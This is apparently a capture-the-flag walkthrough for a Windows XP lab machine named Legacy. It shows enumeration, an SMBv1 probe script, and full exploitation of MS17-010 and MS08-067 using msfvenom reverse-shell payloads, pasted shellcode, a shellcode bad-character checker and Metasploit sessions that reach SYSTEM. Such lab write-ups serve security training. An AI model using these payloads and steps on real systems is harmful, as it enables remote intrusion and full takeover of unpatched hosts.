Legacy

OS: Windows
Difficulty: Easy
Points: 20

Nmap Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.4 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.047s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Enumeration

The machine only exposes ports 135 (MSRPC), 139 (NetBIOS session) and 445 (SMB over TCP), the classic Windows file-sharing and RPC footprint. Notably, the operating system is Windows XP.

Using nmap's vulnerability scripts we find that the host is vulnerable to MS17-010, also known as EternalBlue, and additionally to MS08-067. The wildcard is quoted so the shell does not expand it before nmap sees it.

nmap -p $ports --script "*vuln*" 10.10.10.4
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).

We check the SMB dialect and signing configuration with netexec: the host speaks SMBv1 and does not require signing.

netexec smb 10.10.10.4
SMB         10.10.10.4      445    LEGACY           [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True)
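The two facts netexec reports above (SMBv1:True, signing:False) are exactly what makes MS17-010 reachable: the bug lives in the SMBv1 code path, and the checker scripts start with an SMBv1 negotiate. The script below is an added example, not part of this writeup or of netexec/nmap, that sends one SMB_COM_NEGOTIATE over a raw socket and reads the same two facts from the response (the chosen dialect and the SecurityMode signing bits). It only tells you that SMBv1 is enabled, not that the host is vulnerable; the nmap script goes on to send a Trans2 request for that. The function names, the default target of 10.10.10.4 and the sample response used for offline testing are assumptions made for illustration.

```python
import socket
import struct
import sys

SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"
# SMB1 dialects offered, in order; the server answers with the index of the one it picks.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0",
    b"LANMAN1.0",
    b"Windows for Workgroups 3.1a",
    b"LM1.2X002",
    b"LANMAN2.1",
    NT_LM_012,
]


def smb1_header(command, flags=0x18, flags2=0xC001, tid=0, pid=0x1234, uid=0, mid=1):
    """32-byte SMB1 header: magic, Command, NT Status, Flags, Flags2, PIDHigh,
    SecurityFeatures, Reserved, TID, PIDLow, UID, MID (all little-endian)."""
    return (
        b"\xffSMB"
        + struct.pack("<BIBHH", command, 0, flags, flags2, 0)
        + b"\x00" * 8          # SecurityFeatures (message signature), unused here
        + b"\x00\x00"          # Reserved
        + struct.pack("<HHHH", tid, pid, uid, mid)
    )


def build_negotiate_request(dialects=DIALECTS):
    """SMB_COM_NEGOTIATE: WordCount=0, ByteCount, then each dialect as 0x02 + ASCII + NUL,
    wrapped in a NetBIOS session message (type 0x00 followed by a 24-bit big-endian length)."""
    blob = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = smb1_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(blob)) + blob
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate_response(packet, dialects=DIALECTS):
    """Interpret the reply. For the NT LM 0.12 dialect the 17 parameter words start with
    DialectIndex (2 bytes) and SecurityMode (1 byte: 0x04 signing enabled, 0x08 required)."""
    if len(packet) < 4 + 32 + 1:
        return {"smb1": False, "reason": "reply too short"}
    smb = packet[4:]
    if smb[:4] == b"\xfeSMB":
        return {"smb1": False, "reason": "server answered with SMB2"}
    if smb[:4] != b"\xffSMB":
        return {"smb1": False, "reason": "not an SMB reply"}
    command, status = struct.unpack("<BI", smb[4:9])
    if command != SMB_COM_NEGOTIATE or status != 0:
        return {"smb1": False, "reason": "negotiate failed, NT status 0x%08x" % status}
    word_count = smb[32]
    if word_count == 0:
        return {"smb1": False, "reason": "empty negotiate response"}
    dialect_index = struct.unpack("<H", smb[33:35])[0]
    if dialect_index == 0xFFFF or dialect_index >= len(dialects):
        return {"smb1": False, "reason": "none of the offered dialects accepted"}
    result = {"smb1": True, "dialect_index": dialect_index, "dialect": dialects[dialect_index].decode()}
    if dialects[dialect_index] == NT_LM_012 and word_count == 17:
        security_mode = smb[35]
        result["signing_enabled"] = bool(security_mode & 0x04)
        result["signing_required"] = bool(security_mode & 0x08)
    return result


def make_sample_response(dialect_index=5, security_mode=0x03):
    """Constructed sample reply (not a real capture), shaped like an XP-era NT LM 0.12
    negotiate response, so the parser can be exercised offline. 0x03 = user-level
    security with challenge/response and no signing, which is what netexec reported."""
    params = struct.pack("<HB", dialect_index, security_mode) + b"\x00" * 31   # 17 words
    smb = smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + b"\x11" + params + b"\x00\x00"
    return struct.pack(">I", len(smb)) + smb


def probe_smb1(host, port=445, timeout=5.0):
    """Send one SMB1 negotiate to host:port and parse the reply. A reset or an empty
    reply usually means SMB1 is disabled or removed on the server."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        try:
            head = s.recv(4)
            if len(head) < 4:
                return {"smb1": False, "reason": "empty reply"}
            length = struct.unpack(">I", head)[0] & 0x00FFFFFF
            body = b""
            while len(body) < length:
                chunk = s.recv(length - len(body))
                if not chunk:
                    break
                body += chunk
        except (ConnectionResetError, socket.timeout):
            return {"smb1": False, "reason": "connection reset or timed out"}
    return parse_negotiate_response(head + body)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.4"   # assumed target
    print(probe_smb1(target))
```

Run it as `python3 smb1_probe.py 10.10.10.4`; against Legacy the expected shape is `{'smb1': True, 'dialect': 'NT LM 0.12', 'signing_enabled': False, 'signing_required': False}`, which is the same state netexec prints as SMBv1:True and signing:False.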

MS17-010 - Eternal Blue (CVE-2017-0143)

MS17-010, also known as EternalBlue, is a critical flaw in the SMBv1 (Server Message Block version 1) implementation of Windows that lets a remote attacker execute arbitrary code on vulnerable systems. Since this host still speaks SMBv1, it is exposed.

This vulnerability can be exploited in several ways. First we do it manually with the scripts from the helviojunior/MS17-010 repository (see References).

Python 2 setup

These scripts need Python 2. We install pip for Python 2.

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py

We upgrade setuptools and install virtualenv.

python2 -m pip install setuptools --upgrade
python2 -m pip install virtualenv

Now we create a virtual environment so we do not affect the system installation.

python2 -m virtualenv /opt/venv2

We activate the environment.

source /opt/venv2/bin/activate

Install Impacket

We install a version of impacket that supports Python 2; here we use 0.10.0.

pip install impacket==0.10.0

Now we download the scripts we are going to use.

git clone https://github.com/helviojunior/MS17-010

Exploit

First we create the executable that will give us a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

Now we start a netcat listener.

nc -lvnp 1234

Finally we run the exploit, which uploads and executes our payload (while the virtual environment is active, python resolves to its Python 2).

python /opt/MS17-010/send_and_execute.py 10.10.10.4 shell.exe

And we get the reverse shell.

We notice that whoami is not available (Windows XP does not ship whoami.exe) and echo %username% does not tell us which user we are, so we copy the whoami binary shipped with Kali Linux.

cp /usr/share/windows-binaries/whoami.exe .

Next we start an SMB server sharing the directory that holds the binary. Windows XP only speaks SMBv1, so the -smb2support flag is not needed here, but it does no harm.

impacket-smbserver tmp . -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

We run it from the Legacy machine, straight from the share.

\\10.10.14.2\tmp\whoami.exe

Metasploit

It is also possible to use the Metasploit module.

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x863a1938
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... aQWHhbhQ.exe
[*] 10.10.10.4:445 - Created \aQWHhbhQ.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (177734 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \aQWHhbhQ.exe...
[*] Meterpreter session 2 opened (10.10.14.2:4444 -> 10.10.10.4:1038) at 2025-01-07 07:02:38 -0500

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

MS08-067 - Code Execution (CVE-2008-4250)

The MS08-067 vulnerability is a critical flaw in the Server service of several Windows versions (such as XP, Vista, and 2000). It allows an attacker to remotely execute code over the network, without user interaction, by sending specially crafted RPC requests that overflow a buffer during path canonicalization.

To exploit this second vulnerability we use the andyacer/ms08_067 script (see References). First we generate the shellcode, excluding the bytes the exploit cannot carry.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] =
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xf7\x96\xa8\x9f\x83\xee\xfc\xe2\xf4\x0b\x7e\x2a\x9f"
"\xf7\x96\xc8\x16\x12\xa7\x68\xfb\x7c\xc6\x98\x14\xa5\x9a"
"\x23\xcd\xe3\x1d\xda\xb7\xf8\x21\xe2\xb9\xc6\x69\x04\xa3"
"\x96\xea\xaa\xb3\xd7\x57\x67\x92\xf6\x51\x4a\x6d\xa5\xc1"
"\x23\xcd\xe7\x1d\xe2\xa3\x7c\xda\xb9\xe7\x14\xde\xa9\x4e"
"\xa6\x1d\xf1\xbf\xf6\x45\x23\xd6\xef\x75\x92\xd6\x7c\xa2"
"\x23\x9e\x21\xa7\x57\x33\x36\x59\xa5\x9e\x30\xae\x48\xea"
"\x01\x95\xd5\x67\xcc\xeb\x8c\xea\x13\xce\x23\xc7\xd3\x97"
"\x7b\xf9\x7c\x9a\xe3\x14\xaf\x8a\xa9\x4c\x7c\x92\x23\x9e"
"\x27\x1f\xec\xbb\xd3\xcd\xf3\xfe\xae\xcc\xf9\x60\x17\xc9"
"\xf7\xc5\x7c\x84\x43\x12\xaa\xfe\x9b\xad\xf7\x96\xc0\xe8"
"\x84\xa4\xf7\xcb\x9f\xda\xdf\xb9\xf0\x69\x7d\x27\x67\x97"
"\xa8\x9f\xde\x52\xfc\xcf\x9f\xbf\x28\xf4\xf7\x69\x7d\xcf"
"\xa7\xc6\xf8\xdf\xa7\xd6\xf8\xf7\x1d\x99\x77\x7f\x08\x43"
"\x3f\xf5\xf2\xfe\xa2\x95\xf9\x94\xc0\x9d\xf7\x92\x7a\x16"
"\x11\xfc\xb8\xc9\xa0\xfe\x31\x3a\x83\xf7\x57\x4a\x72\x56"
"\xdc\x93\x08\xd8\xa0\xea\x1b\xfe\x58\x2a\x55\xc0\x57\x4a"
"\x9f\xf5\xc5\xfb\xf7\x1f\x4b\xc8\xa0\xc1\x99\x69\x9d\x84"
"\xf1\xc9\x15\x6b\xce\x58\xb3\xb2\x94\x9e\xf6\x1b\xec\xbb"
"\xe7\x50\xa8\xdb\xa3\xc6\xfe\xc9\xa1\xd0\xfe\xd1\xa1\xc0"
"\xfb\xc9\x9f\xef\x64\xa0\x71\x69\x7d\x16\x17\xd8\xfe\xd9"
"\x08\xa6\xc0\x97\x70\x8b\xc8\x60\x22\x2d\x48\x82\xdd\x9c"
"\xc0\x39\x62\x2b\x35\x60\x22\xaa\xae\xe3\xfd\x16\x53\x7f"
"\x82\x93\x13\xd8\xe4\xe4\xc7\xf5\xf7\xc5\x57\x4a"

We paste the output into the Python script.

ms08_067_2018.py
shellcode=(
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xf7\x96\xa8\x9f\x83\xee\xfc\xe2\xf4\x0b\x7e\x2a\x9f"
"\xf7\x96\xc8\x16\x12\xa7\x68\xfb\x7c\xc6\x98\x14\xa5\x9a"
"\x23\xcd\xe3\x1d\xda\xb7\xf8\x21\xe2\xb9\xc6\x69\x04\xa3"
"\x96\xea\xaa\xb3\xd7\x57\x67\x92\xf6\x51\x4a\x6d\xa5\xc1"
"\x23\xcd\xe7\x1d\xe2\xa3\x7c\xda\xb9\xe7\x14\xde\xa9\x4e"
"\xa6\x1d\xf1\xbf\xf6\x45\x23\xd6\xef\x75\x92\xd6\x7c\xa2"
"\x23\x9e\x21\xa7\x57\x33\x36\x59\xa5\x9e\x30\xae\x48\xea"
"\x01\x95\xd5\x67\xcc\xeb\x8c\xea\x13\xce\x23\xc7\xd3\x97"
"\x7b\xf9\x7c\x9a\xe3\x14\xaf\x8a\xa9\x4c\x7c\x92\x23\x9e"
"\x27\x1f\xec\xbb\xd3\xcd\xf3\xfe\xae\xcc\xf9\x60\x17\xc9"
"\xf7\xc5\x7c\x84\x43\x12\xaa\xfe\x9b\xad\xf7\x96\xc0\xe8"
"\x84\xa4\xf7\xcb\x9f\xda\xdf\xb9\xf0\x69\x7d\x27\x67\x97"
"\xa8\x9f\xde\x52\xfc\xcf\x9f\xbf\x28\xf4\xf7\x69\x7d\xcf"
"\xa7\xc6\xf8\xdf\xa7\xd6\xf8\xf7\x1d\x99\x77\x7f\x08\x43"
"\x3f\xf5\xf2\xfe\xa2\x95\xf9\x94\xc0\x9d\xf7\x92\x7a\x16"
"\x11\xfc\xb8\xc9\xa0\xfe\x31\x3a\x83\xf7\x57\x4a\x72\x56"
"\xdc\x93\x08\xd8\xa0\xea\x1b\xfe\x58\x2a\x55\xc0\x57\x4a"
"\x9f\xf5\xc5\xfb\xf7\x1f\x4b\xc8\xa0\xc1\x99\x69\x9d\x84"
"\xf1\xc9\x15\x6b\xce\x58\xb3\xb2\x94\x9e\xf6\x1b\xec\xbb"
"\xe7\x50\xa8\xdb\xa3\xc6\xfe\xc9\xa1\xd0\xfe\xd1\xa1\xc0"
"\xfb\xc9\x9f\xef\x64\xa0\x71\x69\x7d\x16\x17\xd8\xfe\xd9"
"\x08\xa6\xc0\x97\x70\x8b\xc8\x60\x22\x2d\x48\x82\xdd\x9c"
"\xc0\x39\x62\x2b\x35\x60\x22\xaa\xae\xe3\xfd\x16\x53\x7f"
"\x82\x93\x13\xd8\xe4\xe4\xc7\xf5\xf7\xc5\x57\x4a"
)
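Pasting the shellcode by hand is where these exploits usually go wrong: a single forbidden byte that slipped through the encoder, or a truncated copy, leaves you with a dead listener and no error. The script below is an added example, not part of this writeup or of the ms08_067 repository. It takes msfvenom's `-f c` output, verifies that the declared payload size matches the bytes actually present and that none of the bytes passed to `-b` above survived, and then re-emits the bytes in the form the `shellcode=( ... )` block in ms08_067_2018.py expects. The explanation of the bad-character list is limited to what the nmap output states (the overflow happens during path canonicalization); the two embedded samples are constructed for the offline test and are not real msfvenom runs.

```python
import re

# The bytes the page's msfvenom command forbids: -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40".
# The MS08-067 overflow is triggered while a path is canonicalized, so a NUL
# (string terminator), the separators '\\' (0x5c) and '/' (0x2f) and '.' (0x2e)
# would be interpreted before the payload runs; the remaining entries are
# constraints carried over from the exploit script's own -b list.
BAD_CHARS = bytes.fromhex("000a0d5c5f2f2e40")

C_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
SIZE_LINE = re.compile(r"Payload size:\s*(\d+)\s*bytes")


def parse_msfvenom_c(text):
    """Pull the payload bytes out of msfvenom '-f c' output: the \\xNN escapes inside
    the unsigned char buf[] string literals. The banner lines contain no escapes."""
    return bytes(int(h, 16) for h in C_ESCAPE.findall(text))


def declared_size(text):
    """'Payload size: N bytes' as printed by msfvenom, or None if the line is absent."""
    m = SIZE_LINE.search(text)
    return int(m.group(1)) if m else None


def find_bad_chars(payload, bad=BAD_CHARS):
    """(offset, byte) for every forbidden byte, so a failed encode is caught before
    the exploit is fired rather than diagnosed from a silent listener."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def to_python_literal(payload, name="shellcode", width=14):
    """Re-emit the bytes as adjacent string literals inside parentheses, 14 bytes per
    line, the layout the ms08_067_2018.py script uses for its shellcode variable."""
    lines = []
    for i in range(0, len(payload), width):
        lines.append('"' + "".join("\\x%02x" % b for b in payload[i:i + width]) + '"')
    return "%s=(\n%s\n)" % (name, "\n".join(lines))


def check_payload(text, bad=BAD_CHARS):
    """Parse, size-check and bad-char-check one msfvenom '-f c' output."""
    payload = parse_msfvenom_c(text)
    size = declared_size(text)
    return {
        "payload": payload,
        "length": len(payload),
        "size_matches": size is None or size == len(payload),
        "bad": find_bad_chars(payload, bad),
    }


# Constructed samples (not real msfvenom runs): a clean fragment taken from the
# first bytes of the page's payload, and one carrying two forbidden bytes.
SAMPLE_CLEAN = r'''Payload size: 6 bytes
unsigned char buf[] =
"\x31\xc9\x83\xe9"
"\xaf\xe8";
'''
SAMPLE_DIRTY = r'''Payload size: 4 bytes
unsigned char buf[] =
"\x31\xc9\x00\x5c";
'''

if __name__ == "__main__":
    import sys
    # Pipe the msfvenom output in; with no stdin the clean sample is used.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CLEAN
    report = check_payload(text)
    if report["bad"] or not report["size_matches"]:
        print("REJECT: bad bytes at %s, size ok=%s" % (report["bad"], report["size_matches"]))
        sys.exit(1)
    print(to_python_literal(report["payload"]))
```

Usage is `msfvenom ... -f c | python3 check_shellcode.py`; a non-zero exit means regenerate (pick another encoder or add the offending byte to `-b`) instead of editing the script.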

We start our netcat listener.

nc -lvnp 1234

We run the following command. The second argument selects the target OS in the script (6 is one of the Windows XP SP3 English entries) and the third is the port.

python ms08_067/ms08_067_2018.py 10.10.10.4 6 445

This gives us our reverse shell.

Metasploit

We can also use the Metasploit module.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (177734 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.4:1037) at 2025-01-07 06:57:52 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

References

https://github.com/helviojunior/MS17-010
https://github.com/fortra/impacket
https://github.com/andyacer/ms08_067